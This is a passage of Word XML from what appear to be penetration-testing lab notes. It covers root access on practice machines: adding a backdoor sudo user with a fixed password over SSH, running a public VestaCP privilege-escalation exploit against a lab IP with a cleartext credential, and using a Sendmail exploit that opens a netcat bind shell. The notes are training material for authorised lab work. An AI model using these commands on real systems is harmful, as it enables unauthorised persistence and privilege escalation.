      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003976">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ORRRR, you can just use "cat" and read local.txt and proof.txt. I could tell local.txt was in /home/jack/local.txt since FTP directory looked like /home/jack and it had a local.txt that I couldn't read. But, you can also use find command to find local.txt and root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003977">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find / -name local.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003978">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find / -name proof.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003979">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397A">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ORRRRR, you can</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> add another user and add them to the sudo group</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that they can run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and get a root shell. this is like adding a new user in windows and adding them to admin group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397B">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useradd -m -s /bin/bash michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>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-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → make a home dir (/home/michael)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>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-s /bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → give it bash as default shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397E">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Verify that there is a michael directory in /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000397F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="142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ls /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003980">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echo 'michael:SuperSecret123!' | chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003981">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Give them sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usermod -aG sudo michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003983">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On distros without the sudo group, you might use wheel instead:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003984">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="fa0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usermod -aG wheel michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003985">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Check that SSH daemon is running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003986">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="fa0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl status ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003987">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows password login:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003988">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PermitRootLogin prohibit-password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003989">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PasswordAuthentication yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398A">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Restart sshd if you change the config:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398B">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systemctl restart ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1427"/>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ssh michael@192.168.239.156</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398D">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password is: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SuperSecret123!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="fa0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000398F">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and now you're root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003990">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Or you could try editing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which I've taught in the notes. This is another way to add a root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003991">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Here is how to exploit Vesta manually</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003992">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1255">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://ssd-disclosure.com/ssd-advisory-vestacp-lpe-vulnerabilities/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On discord, another popular exploit used was this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1256">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/rekter0/exploits/tree/master/VestaCP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003995">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The file you want to run is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vestaROOT.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. There are multiple different exploits, but this one gets you root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003996">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I tried this one out, but this one requires dependency files. So instead of downloading just vestaROOT.py, you have to download the whole VestaCP directory and then run vestaROOT.py within that directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003997">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git clone</w:t>
      </w:r>
      <w:hyperlink r:id="rId1257">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="fa0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1258">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/rekter0/exploits.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003998">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cd exploits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003999">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cd VestaCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="fa0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 vestaROOT.py</w:t>
      </w:r>
      <w:hyperlink r:id="rId1259">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="fa0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1260">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://192.168.239.156:8083</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> jack 3PUKsX98BMupBiCf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1427"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="darkBlue"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make sure it's https and not http</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_diqy3yq2nxk5" w:id="536"/>
      <w:bookmarkEnd w:id="536"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clamav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1261">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ClamAV</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, after searching up the SMTP version (Sendmail 8.13.4/8.13.4/ exploitdb), we found this exploit which ended up opening a bind shell we can connect to via netcat and we got root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000399F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1262">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/4761</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ln757vh39s1z" w:id="537"/>
      <w:bookmarkEnd w:id="537"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zookeeper (port 2181)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1263">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pelican</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
